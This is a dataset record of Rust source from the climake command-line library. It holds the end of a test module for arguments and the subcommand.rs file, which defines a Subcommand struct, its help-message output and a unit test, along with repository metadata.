arg.add_lcalls(vec!["a".to_string(), "b".to_string()]) .add_lcalls(vec!["c".to_string()]); assert_eq!( arg, Argument::new("example", vec![], vec!["a", "b", "c"], Input::None) ) } /// Checks that the [From]<[CallType]> implementation for [String] works correctly #[test] fn string_from_calltype() { assert_eq!(String::from(CallType::Short('h')), "h".to_string()); assert_eq!( String::from(CallType::Long("testing".to_string())), "testing".to_string() ); } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/core/subcommand.rs
src/core/subcommand.rs
//! Contains [Subcommand]-related items, see specific documentation for more //! information use super::utils::writeln_term; use super::{Argument, CliMake}; use crate::HELP_DEFAULT; use std::io::Write; /// A subcommand attached to the cli, allowing commands and sections of the cli /// to form #[derive(Debug, PartialEq, Clone)] pub struct Subcommand<'a> { /// Name of subcommand, used both in help and as the single calling method pub name: &'a str, /// Argument(s) attached to this [Subcommand], if any pub arguments: Vec<&'a Argument<'a>>, /// Recursive subcommands attached to this [Subcommand], if any pub subcommands: Vec<&'a Subcommand<'a>>, /// Optional short description of this subcommand pub help: Option<&'a str>, } impl<'a> Subcommand<'a> { /// Creates a new subcommand from given abstracted inputs pub fn new( name: impl Into<&'a str>, arguments: impl Into<Vec<&'a Argument<'a>>>, subcommands: impl Into<Vec<&'a Subcommand<'a>>>, help: impl Into<Option<&'a str>>, ) -> Self { Self { name: name.into(), arguments: arguments.into(), subcommands: subcommands.into(), help: help.into(), } } /// Displays help infomation for this subcommand specifically which is used /// inside the execution of the cli /// /// A referenced [CliMake] is needed for this method due to it displaying a /// header message using [CliMake::header_msg] with an altered usage line, as /// seen in the examples. pub(crate) fn help_msg(&self, climake: &CliMake, buf: &mut impl Write) -> std::io::Result<()> { climake.header_msg(self.name, buf)?; match self.help { Some(help) => { buf.write("\nAbout:\n".as_bytes())?; writeln_term(help, buf)?; } None => (), }; // TODO: merge this into a utility func shared with CliMake::help_msg buf.write("\nArguments:\n".as_bytes())?; if self.arguments.len() > 0 { for argument in self.arguments.iter() { argument.help_name_msg(buf)?; } } else { buf.write(" No arguments found\n".as_bytes())?; } buf.write("\nSubcommands:\n".as_bytes())?; if self.subcommands.len() > 0 { for subcommand in self.subcommands.iter() { subcommand.help_name_msg(buf)?; } } else { buf.write(" No subcommands found\n".as_bytes())?; } Ok(()) } /// Generates compact help message for current [Subcommand] /// /// This writes directly to a buffer of some kind (typically [std::io::stdout]) /// for simplicity, perf and extendability reasons. /// /// # Example /// /// What this may look like: /// /// ```none /// example — A simple example subcommand /// ``` pub(crate) fn help_name_msg(&self, buf: &mut impl Write) -> std::io::Result<()> { let formatted_help = match self.help { Some(msg) => msg, None => HELP_DEFAULT, }; writeln_term(format!("{} — {}", self.name, formatted_help), buf) } } #[cfg(test)] mod tests { use super::*; /// Checks that the [Subcommand::help_name_msg] method works correctly #[test] fn name_help() -> std::io::Result<()> { let mut chk_vec: Vec<u8> = vec![]; Subcommand::new("command", vec![], vec![], "A simple command") .help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " command — A simple command\n" ); Ok(()) } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false